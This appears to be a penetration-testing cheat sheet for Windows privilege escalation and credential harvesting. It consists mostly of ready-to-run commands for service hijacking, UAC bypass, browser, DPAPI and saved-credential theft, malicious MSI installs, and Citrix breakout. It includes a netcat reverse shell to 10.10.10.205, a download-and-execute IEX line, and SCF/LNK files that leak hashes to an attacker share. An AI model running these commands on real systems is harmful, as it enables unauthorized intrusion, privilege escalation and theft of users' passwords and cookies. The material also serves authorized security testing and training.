Windows

Enumeration

Tool	Details
WinPEAS	DOWNLOAD. In Metasploit.
PrivescCheck	powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck" Get-Content .\PrivescCheck.ps1 | Out-String | IEX

Functionality

LOLBAS shows how to exploit vulnerabilities on known programs to perform privileged actions.

LOLBAS

Groups and Privileges

Privileges should be displayed possibly with privileged shell.

whoami /priv

They should be activated with EnableAllTokenPrivs.ps1.

.\EnableAllTokenPrivs.ps1

• SeImpersonate & SeAssignPrimaryToken
• SeDebug
• SeTakeOwnership
• SeBackupPrivilege (Backup Operators)
• Event Log Readers
• DnsAdmins
• Print Operators
• Server Operators
• Hyper-V Administrators

See HERE for full list.

User Account Control (UAC)

Feature that enables a consent prompt for elevated activities. When UAC is enabled, applications and tasks always run under the security context of a non-administrator account unless an administrator explicitly authorizes these applications/tasks to have administrator-level access to the system to run. UAC has various integrity levels ranging from low to high.

UAC

Check if UAC is enabled.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

Integrity Levels

Check integrity levels. See HERE.

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

0 = Elevate without prompting
1 = Prompt for credentials on the secure desktop
2 = Prompt for consent on the secure desktop
3 = Prompt for credentials
4 = Prompt for consent
5 = Prompt for consent for non-Windows binaries (default)

UACMe

Compile UACMe with Visual Studio to get akagi.exe.

Check version and obtain Build

[environment]::OSVersion.Version

Search for the Key based on the Build number in the github

akagi.exe [Key] [Param]

Misconfigurations & Weak Permissions

Tool	Details
SharpUp	.\SharpUp.exe audit
PowerUP (PowerSploit or Empire)	powershell -ep bypass . .\PowerUp.ps1 See HERE.

Modifiable Service Binaries (weak ACLs)

.\SharpUp.exe audit
# === Modifiable Service Binaries ===

Using icacls we can verify the vulnerability and see if we have full permissions to the directory.

icacls "<PathName>"

At this point we can replace service binary with malicious binary generated with msfvenom.

cmd /c copy /Y "<MaliciousExe>" "<PathName>"

Start Service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Modifiable Services

.\SharpUp.exe audit
# === Modifiable Service ===

Next, we'll use AccessChk from the Sysinternals suite to enumerate permissions on the service.

accesschk.exe /accepteula -quvcw <NameService>

We can use our permissions to change the binary path maliciously.

sc.exe config <NameService> binPath= "cmd /c <COMMAND>"

Start service.

sc.exe stop <NameService>
sc.exe start <NameService>
sc.exe query <NameService> # for checking after recovery
# or
net stop <NameService>
net start <NameService>
Restart-Service <NameService>

Unquoted Service Paths

If the path of a binary file of a service contains one or more spaces and is not enclosed in quotes, it can be interpreted in various ways by Windows. It starts from left to right and stops at each space, adding .exe. So if we can put a binary file in one of these subdirectories and restart the service, then our binary will be executed. Although it's not uncommon to find applications with unquoted service paths, it isn't often exploitable.

We can identify unquoted service binary paths using

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

Or with PowerUP (PowerSploit or Empire)

. .\PowerUp.ps1
Get-UnquotedService

Permissive Registry ACLs

It is also worth searching for weak service ACLs in the Windows Registry, with AccessChk from the Sysinternals suite

accesschk.exe /accepteula "<USER>" -kvuqsw hklm\System\CurrentControlSet\services

# RW HKLM\System\CurrentControlSet\services\ModelManagerService
#        KEY_ALL_ACCESS

We can abuse this using

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
# start service

Modifiable Registry Autorun Binary

We can use WMIC to see what programs run at system startup. Suppose we have write permissions to the registry for a given binary or can overwrite a binary listed. In that case, we may be able to escalate privileges to another user the next time that the user logs in.

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

File

Search for sensitive information in different files

dir /s *<STRING>* 

unattend.xml

dir /s *unattend.xml*

dir /s *autounattend.xml*

Application Configuration Files

Look for readable configuration files in which passwords can be saved.

findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml

findstr /si password *.xml *.ini *.txt *.config

findstr /spin "password" *.*

cd c:\Users\<USER>\Documents & findstr /SI /M "password" *.xml *.ini *.txt

select-string -Path C:\Users\<USER>\Documents\*.txt -Pattern password

dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*

where /R C:\ *.config

Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Dictionary Files

The user can add words to their dictionary to avoid the distracting red underline, including passwords.

gc 'C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String <STRING>

PowerShell Credentials

Administrators often need to create automated scripts for users that also contain credentials. The credentials are encrypted and protected via DPAPI, which typically means they can only be decrypted by the same user on the same computer they were created on.

Example script

# Connect-VC.ps1
# Get-Credential | Export-Clixml -Path 'C:\scripts\pass.xml'
$encryptedPassword = Import-Clixml -Path 'C:\scripts\pass.xml'
$decryptedPassword = $encryptedPassword.GetNetworkCredential().Password
Connect-VIServer -Server 'VC-01' -User 'bob_adm' -Password $decryptedPassword

If we have gained command execution in the context of this user we can recover the cleartext credentials

$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
$credential.GetNetworkCredential().username
$credential.GetNetworkCredential().password

StickyNotes

C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Copy them to your system and open them with DB Browser for SQLite, or with PSSQLite on the target

Import-Module .\PSSQLite.psd1
$db = 'C:\Users\<USER>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap

Password Managers

KeePass, 1Password, Thycotic, CyberArk, etc.

dir /s *.kdbx*

keepass2john <FILE.kdbx>

Crack with hashcat 13400.

VHDX & VMDK

dir /S /B *.vhd == *.vhdx == *.vmdk

Get-ChildItem -Path C:\ -Recurse -Include *.vhd, *.vhdx, *.vmdk -ErrorAction SilentlyContinue

We can get SYSTEM, SAM and SECURITY files.

Mount .vhd & .vhdx

guestmount --add <FILE>.vhdx  --ro /mnt/vhdx/ [-m /dev/sda1]

Mount .vmdk

guestmount -a <FILE>.vmdk -i --ro /mnt/vmdk

Shares SMB

With netexec search for interesting files among the shares.

nxc smb <IP> -u <USER> -p <PASS> --spider '<SHARE>' --regex '<REGEX>'

nxc smb <IP> -u <USER> -p <PASS> -M spider_plus

(try again if there are errors)

Password

Search for passwords saved in the system.

Tool	Details
LaZagne	It searches for passwords. laZagne.exe all
SessionGopher	Extract saved PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP credentials. Import-Module .\SessionGopher.ps1 Invoke-SessionGopher -Target <MACHINE, es.WINLPE-SRV01>
Snaffler	It searches for passwords and interesting file. .\snaffler.exe -s -o snaffler.log [-i] .\snaffler.exe -s -d <domain> -o snaffler.log [-i]

Browser

Tool	Details
SharpChrome	Retrieve cookies and saved logins from Google Chrome. .\SharpChrome.exe logins /unprotect
SharpChromium	Retrieve Chromium data, such as cookies, history and saved logins.
Invoke-SharpChromium	PowerShell script which uses reflection to load SharpChromium. Import-Module .\Invoke-SharpChromium.ps1 Invoke-SharpChromium -Command "cookies <SITE>" If we have a path error, copy the cookie file path that contains the database to the location SharpChromium is expecting.
cookieextractor	Extract cookies from the Firefox cookies.SQLite database. Copy and transfer the DB with cookies to the attacking machine. copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite .

Archived Passwords

cmdkey /list
# take note of user

Connect with RDP GUI or with runas

runas /savecred /user:<DOMAIN>\<USER> "<COMMAND>"

Autorun

Windows Autologon allows a system to automatically log on to a specific user account, without requiring manual input of the username and password at each startup. The username and password are stored in the registry, in clear-text. Autologon.exe from the Sysinternals suite encrypt the password as an LSA secret.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Putty

For Putty sessions utilizing a proxy connection, when the session is saved, the credentials are stored in the registry in clear text.

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions"
# take note of sessions

reg query "HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions\<NAME_SESSION>"

if we had admin privileges, we would be able to find it under the corresponding user's hive in HKEY_USERS.

DPAPI

The DPAPI (Data Protection API) is an internal component in the Windows system. It allows various applications to store sensitive data (e.g. passwords). The data are stored in the users directory and are secured by user-specific master keys derived from the users password.

# MASTER KEY ENCRYPTED
ls -Hidden C:\<Users>\USER\AppData\Roaming\Microsoft\Protect\
ls -Hidden C:\<Users>\USER\AppData\Local\Microsoft\Protect\
# PROTECTED FILE
ls -Hidden C:\<Users>\USER\AppData\Roaming\Microsoft\Credentials\
ls -Hidden C:\<Users>\USER\AppData\Local\Microsoft\Credentials\

Get-Content <FILE>

Linux

IMPORTANT: Copy files well from windows (ex. use base64)

impacket-dpapi	Extract Master Key dpapi masterkey -file <MASTERKEY> -sid "<SUID>" -password '<USER_PASS>' Extract Protected Data wit Master Key dpapi credential -f <PROTECTED_FILE> -key <MASTERKEY>

Other tools like DonPAPI, dpapick, dpapilab and secretsdump.py.

Windows

Mimikatz	Extract Master Key dpapi::masterkey /in:"C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>" /sid:<SID> /password:<PASS> /protected /rpc Extract Protected Data wit Master Key dpapi::cred /in:<PROTECTED_FILE> /masterkey:<MASTERKEY>

See HERE and HERE.

Various

Variables

Check environment variables for sensitive information such as passwords or misconfiguration.

set 

Get-ChildItem Env: | ft key,value

History

Often administrators clean the history only with Clear-History, but this is not enough as it only cleans the Get-History, but the history can be found with PSReadline.

Get-History 

(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath

C:\Users\USER\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Scheduled Tasks

Get-ScheduledTask

schtasks /query /fo LIST /v
# Task To Run

Unfortunately, we cannot list out scheduled tasks created by other users (such as admins) because they are stored in C:\Windows\System32\Tasks. Perform an analysis if there are files that can be the target of Scheduled Tasks by Administrator.

DLL Injection

• LoadLibrary

• Manual Mapping

• Reflective DLL Injection

• DLL Hijacking

Vulnerable Service & Applications

Some services/applications may allow us to escalate to SYSTEM. Enumerate the installed applications carefully and check if they contain vulnerabilities.

Druva inSync 6.6.3	CVE-2020-5752 with Invoke-PowerShellTcp.ps1 (see Reverse Shell)
mRemoteNG	Used to manage and connect to remote systems using VNC, RDP, SSH, and similar protocols. %USERPROFILE%\APPDATA\Roaming\mRemoteNG\confCons.xml (take password in <NODE>) Use mRemoteNG-Decrypt mremoteng_decrypt.py -s "<PASSWORD>" mremoteng_decrypt.py -s "<PASSWORD>" -p <MasterPass> (try brute force MasterPass with wordlists and foreach)

Always Install Elevated

You can add /v AlwaysInstallElevated

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer

Create msi payload with msfvenom and run it on target.

msiexec /i myExploit.msi /quiet /qn /norestart

Or use Write-UserAddMSI in PowerUP (PowerSploit or Empire)

Import-Module .\PowerUp.ps1
Write-UserAddMSI
.\UserAdd.msi

Citrix Breakout

Windows Dialog Boxes

It is possible to utilize windows dialog boxes (with features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, Print, etc.) as a means to bypass the restrictions imposed on users when browsing directories.

In File Name with All Files in File-Type.

\\127.0.0.1\c$\<PATH>

With smbserver on the attacker

\\<MY_IP>\share

Due to the presence of restrictions within the File Explorer, direct file copying is not viable. An alternative approach involves: right-clicking > run Where the executable will open a terminal, as it is the following:

#include <stdlib.h>
int main() {
  system("C:\\Windows\\System32\\cmd.exe");
}

Alternative Editor

Alternative File System Editors like Q-Dir or Explorer++ can be employed as a workaround.

Similarly when the default Registry Editor is blocked by group policy, alternative Registry editors can be employed to bypass the standard group policy restrictions. Simpleregedit, Uberregedit and SmallRegistryEditor are examples of such GUI tools

Shortcut

Right-click on Shortcut > Properties > Target > C:\\Windows\System32\cmd.exe

Modify Existing Shortcut, also with .lnk file.

Script

When script extensions such as .bat, .vbs, or .ps are configured to automatically execute their code using their respective interpreters, it opens the possibility of dropping a script that can serve as an interactive console.

New file "evil.bat" > Insert "cmd" > Save it > Run it

See resources1, resources2

Email

MailSniper	Searching through email in a Microsoft Exchange environment for specific terms.

Clipboard

Invoke-Clipboard	Stealing the clipboard Import-Module .\Invoke-Clipboard.ps1 Invoke-ClipboardLogger

Backup Program

restic	In $env:RESTIC_PASSWORD is saved the password that is used for backup, if it is not present it will be requested each time. restic.exe -r E:\restic init (init backup directory) restic.exe -r E:\restic\ backup C:\FolderToBackup --use-fs-snapshot to create a Volume Shadow Copy for files actively used restic.exe -r E:\restic\ snapshots restic.exe -r E:\restic\ restore <ID> --target C:\RestoreHere

Interacting with Users

Passive Traffic

Tool	Details
PCredz	Capture sensitive information from live network traffic, with tcpdump
net-creds	Sniffs sensitive data from interface or pcap

Monitoring for Process Command Lines

When getting a shell as a user, there may be scheduled tasks or other processes being executed which pass credentials on the command line. This script captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

procmon.ps1

while($true)
{

  $process = Get-WmiObject Win32_Process | Select-Object CommandLine
  Start-Sleep 1
  $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
  Compare-Object -ReferenceObject $process -DifferenceObject $process2

}

IEX (iwr 'http://<MY_IP>:<MY_PORT>/procmon.ps1')

SCF

If there are public folders that are also accessed by other users and that we have write permissions to, we can insert an .scf file that is executed every time the folder containing it is opened. Using SCFs no longer works on Server 2019 hosts.

<NAME>.scf

[Shell]
Command=2
IconFile=\\<MY_IP>\share\legit.ico
[Taskbar]
Command=ToggleDesktop

sudo responder -I <INTERFACE>

LNK

We can get the same effect as SCF using a malicious .lnk file. We can use various tools to generate a malicious .lnk file, such as Lnkbomb, or we can run this code.

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\<PATH>\<NAME>.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

Kernel

Exploit Kernel Level. Depends on Kernel Version and Operating System. May cause crashes!

Examine the installed update and search KB (Microsoft Knowledge Base ID number) in Update Catalog

systeminfo
wmic qfe list brief
Get-Hotfix

Tool	Details
Sherlock	PowerShell script to quickly find missing software patches. Import-Module .\Sherlock.ps1 Find-AllVulns
Watson	Enumerate missing KBs and suggest exploits.
wesng	Windows Exploit Suggester.
Windows-Exploit-Suggester	Python script for detect potential missing patches. python2.7 windows-exploit-suggester.py --update Save systeminfo output from target windows system. python2.7 windows-exploit-suggester.py --database <DB.xlsx> --systeminfo <SYSTEMINFO.txt>

See Windows-CVE section.